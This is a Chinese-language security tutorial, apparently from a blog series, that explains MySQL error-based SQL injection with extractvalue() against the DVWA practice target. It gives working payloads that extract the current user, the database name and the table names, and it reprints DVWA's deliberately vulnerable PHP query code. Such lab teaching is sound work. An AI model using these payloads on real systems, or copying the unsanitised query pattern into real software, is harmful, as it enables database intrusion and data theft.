一：报错注入概念

数据库在执行SQL语句时，通常会先对SQL进行检测,如果SQL语句存在问题,就会返回错误信息。通过这种机制，我们可以构造恶意的SQL，触发数据库报错，而在报错信息中就存在着我们想要的信息。但通过这种方式，首先要保证SQL结构的正确性。
例如：在mysql中执行
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e));
这条语句本身结构存在问题,缺少右括号，所以还未进入到查询阶段就返回结构性错误，这不是我们想要的报错

当添加上右括号时
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
mysql检查SQL结构没有问题，正常进入查询阶段，而在查询阶段时出错，此时报错信息就可能出现我们想要的信息

二：报错注入流程

在这里我们还是以dvwa为靶机做报错注入演示
http://192.168.230.204/dvwa/vulnerabilities/sqli/?id=1#&Submit=Submit#
在union联合注入篇我们已经确定在id这个参数点为单引号字符，后台SQL含有2列值，具体可参考union联合注入篇。接下来我们可以通过报错注入的方式来获取我们想要的信息。构造输入 1’ and (extractvalue(1,concat(0x7e,(select user()),0x7e))) #
1’ 部分是与后台SQL的单引号做闭合
extractvalue函数是对XML文档进行查询的函数,需要两个参数(目标xml文档,xml路径)
如

# 部分注释掉后半部分未知SQL
执行输入，得到以下结果

1' and (extractvalue(1,concat(0x7e,(select user()),0x7e))) #

错误信息中爆出数据库当前用户名
修改输入1’ and (extractvalue(1,concat(0x7e,(select database()),0x7e))) #

1' and (extractvalue(1,concat(0x7e,(select database()),0x7e))) #

错误信息中爆出当前数据库名
修改输入1’ and (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database()),0x7e))) #

1' and (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database()),0x7e))) #

错误信息中爆出当前数据库下的所有表名: users 和 guestbook
适当修改SQL语句即可完全爆出对应数据表中数据

三：报错函数及原理剖析

本次报错演示利用的是extractvalue函数，其实在mysql中还有很多类似的函数，如updatexml，exp，multipoint等，都有类似的效果，在接下来的注入系列文章会做统一的讲解。今天我们先来看一下extractvalue函数报错后为何会把数据库信息泄露出来
我们以1’ and (extractvalue(1,concat(0x7e,(select database()),0x7e))) #为例
后台的处理程序如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    // Get results
    $num = mysql_numrows( $result );
    $i   = 0;
    while( $i < $num ) {
        // Get values
        $first = mysql_result( $result, $i, "first_name" );
        $last  = mysql_result( $result, $i, "last_name" );

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        // Increase loop count
        $i++;
    }

    mysql_close();
}

?>

由此可知拼接所得的SQL为

1

SELECT first_name, last_name FROM users WHERE user_id = '1' and (extractvalue(1,concat(0x7e,(select database()),0x7e))) #'

在数据库中执行

extractvalue(xml_document,xpath_string)，这个函数用于在xml格式文件中查询。需要两个输入参数，第一个为xml文件内容或文件路径，第二个为xpath格式
如 exractvalue(‘<a><b/></a>’,’/a/b’)
我们构造的输入中
extractvalue(1,concat(0x7e,(select database()),0x7e))，第一个参数为1，第二个参数为concat(0x7e,(select database()),0x7e)
在进入数据库后，数据库首先检查该SQL结构是否完整，是否缺少参数，此例中SQL结构完好
然后在进行解析，检测函数调用过程中参数格式是否正确，在解析到参数二时，select database() 解析为 ‘dvwa’，然后通过concat连接成~dvwa~，最终检测~dvwa~是否满足xpath格式
在这次注入中，~dvwa~明显不满足xpath格式，因此数据库报错提示格式错误

四：后台SQL及拼接后的原型

1
2
3
4
5
6
7
8

1' and (extractvalue(1,concat(0x7e,(select user()),0x7e))) #
SELECT first_name, last_name FROM users WHERE user_id = '1' and (extractvalue(1,concat(0x7e,(select user()),0x7e))) #';

1' and (extractvalue(1,concat(0x7e,(select database()),0x7e))) #
SELECT first_name, last_name FROM users WHERE user_id = '1' and (extractvalue(1,concat(0x7e,(select database()),0x7e))) #';

1' and (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database()),0x7e))) #
SELECT first_name, last_name FROM users WHERE user_id = '1' and (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database()),0x7e))) #';

五：总结

报错注入是通过构造恶意SQL，使数据库报错，从报错信息中得到敏感信息的方法。如果服务器应用没有对这种错误进行处理，则攻击者可以通过页面的错误回显获取数据。

下一期将介绍时间注入

往期推荐：

扫盲帖 | SQL注入简介

SQL注入系列篇之union联合注入

本文作者：第59号实验室

本文为安全脉搏专栏作者发布，转载请注明：https://www.secpulse.com/archives/199935.html